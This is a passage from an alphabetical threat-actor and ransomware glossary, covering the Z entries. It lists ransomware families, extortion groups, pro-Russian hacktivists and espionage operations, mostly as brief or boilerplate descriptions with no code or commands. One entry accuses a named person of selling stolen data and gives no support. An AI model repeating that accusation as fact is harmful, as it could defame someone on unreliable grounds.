It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. This hacker demands that the victim contacts him through email and decrypts the files for FREE.(moreinfo in the link below)
Yulong Flood
Microsoft threat actor profile. Origin/Threat: China, Influence operations.
Yurei
Yurei is an active extortion or ransomware group tracked by RansomLook.
YYTO Ransomware
uses the extension .codyprince92@mail.com.ovgm and drops a ransom note named Readme.txt
YYYYBJQOQDU
ransomware
Z-Pentest Alliance
Z-Pentest Alliance is a pro-Russian hacktivist group known for targeting industrial control systems and operational technology systems, particularly in Italy and Israel. The group has claimed responsibility for various attacks, including gaining control of a water supply management system and disrupting aviation authorities' websites. Z-Pentest Alliance operates within a larger alliance of hacktivist groups, often collaborating on politically motivated operations, including DDoS campaigns. The group has been linked to the GRU and is associated with the NoName057 group, sharing tools and intelligence.
Z3
ransomware
Zack Korman
Self-proclaimed ethical hacker who publishes detailed breach guides for profit. Operates under the guise of security research while selling access to compromised data on forums. Known for aggressive marketing of his courses.
ZariqaCrypt
ransomware
Zarya
Zarya is a pro-Russian hacktivist group that emerged in March 2022. Initially operating as a special forces unit under the command of Killnet, Zarya has since become an independent entity. The group is primarily known for engaging in Denial-of-Service attacks, website defacement campaigns, and data leaks. Zarya targets government agencies, service providers, critical infrastructure, and civil service employees, both domestically and internationally.
Zcrypt
Ransomware
ZekwaCrypt Ransomware
First spotted in May 2016, however made a big comeback in January 2017. It’s directed to English speaking users, therefore is able to infect worldwide. Ransomware is spread with the help of email spam, fake ads, fake updates, infected install files.
Zelta Free
ransomware
ZenCrypt
ransomware
Zenis Ransomware
A new ransomware was discovered this week by MalwareHunterTeam called Zenis Ransomware. While it is currently unknown how Zenis is being distributed, multiple victims have already become infected with this ransomware. What is most disturbing about Zenis is that it not encrypts your files, but also purposely deletes your backups.
Zentrum für Informations- und Kommunikationstechnik (IKTZ): Center for information and communication technology
Zentrum für Informations- und Kommunikationstechnik (IKTZ): Center for information and communication technology
Zeon
Zeon is an active extortion or ransomware group tracked by RansomLook.
Zeoticus
ransomware
zeoticus2
zeoticus2 is an active extortion or ransomware group tracked by RansomLook.
Zeppelin
ransomware
Zero-Fucks
ransomware
Zero Tolerance Gang Ztg
Zero Tolerance Gang Ztg is an active extortion or ransomware group tracked by RansomLook.
ZeroCrypt Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
ZeroLocker
ransomware
Zerolockersec
Zerolockersec is an active extortion or ransomware group tracked by RansomLook.
Zeronine
ransomware
ZeroRansom
ransomware
ZeroSevenGroup
ZeroSevenGroup is a threat actor that claims to have breached a U.S. branch of Toyota, stealing 240GB of sensitive data, including employee and customer information, contracts, and financial details. They have also allegedly gained full network access to critical Israeli infrastructure, with access to 80TB of sensitive data across various sectors. The group has threatened to use the stolen data for malicious activities, including ransomware attacks. Their operations involve exploiting vulnerabilities, as indicated by their reference to manipulating memory through buffer overflow techniques.
Zeta Leaks
Zeta Leaks is an active extortion or ransomware group tracked by RansomLook.
Zetarink
Zetarink is an active extortion or ransomware group tracked by RansomLook.
Zhen
ransomware
Ziggy
ransomware
Zilla
ransomware
Zimbra
Ransomware mpritsken@priest.com
ZimbraCryptor
ransomware
ZinoCrypt Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
ZipLocker
ransomware
Zipper
ransomware
Zircon
Zircon is an active extortion or ransomware group tracked by RansomLook.
zixer2
zixer2 is an active extortion or ransomware group tracked by RansomLook.
Zlader
Ransomware VaultCrypt family
Zloader Threat Actors
This object reflects the TTPs used by threat actors to distribute and deploy the Zloader trojan malware. Researchers have observed actors distributing Zloader in campaigns without attributing the activity to named adversaries, such as the operations described by ESET researchers cited in the References.[[WeLiveSecurity April 19 2022](/references/f86845b9-03c4-446b-845f-b31b79b247ee)] TTPs associated with Zloader binaries themselves can be found in the separate "Zloader" Software object.
Zola
Zola is an active extortion or ransomware group tracked by RansomLook.
Zoldon
ransomware
ZOMBIE SPIDER
On April 7, 2017, Pytor Levashov — who predominantly used the alias Severa or Peter Severa and whom Falcon Intelligence tracks as ZOMBIE SPIDER — was arrested in an international law enforcement operation led by the FBI. ZOMBIE SPIDER’s specialty was large-scale spam distribution, a fundamental component of cybercrime operations. Levashov was the primary threat actor behind a botnet known as Kelihos and its predecessors, Waledac and Storm. In addition to Levashov’s arrest, there was a technical operation conducted by Falcon Intelligence to seize control of the Kelihos botnet.
ZooPark
ZooPark is a cyberespionage operation that has been focusing on Middle Eastern targets since at least June 2015. The threat actors behind ZooPark infect Android devices using several generations of malware we label from v1-v4, with v4 being the most recent version deployed in 2017.
Zorab
ransomware
ZorgoCry
ransomware
Zorro
Ransomware
zScreenLocker Ransomware
This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..
ZXZ Ramsomware
Originated in English, could affect users worldwide, however so far only reports from Saudi Arabia. The malware name founded by a windows server tools is called win32/wagcrypt.A
Zyka Ransomware
It’s directed to English speaking users, therefore is able to infect worldwide. It is spread using email spam, fake updates, attachments and so on. It encrypts all your files, including: music, MS Office, Open Office, pictures, videos, shared online files etc.. Ransom is 170$ or EUR in Bitcoins.
Zyklon
Ransomware Hidden Tear family, GNL Locker variant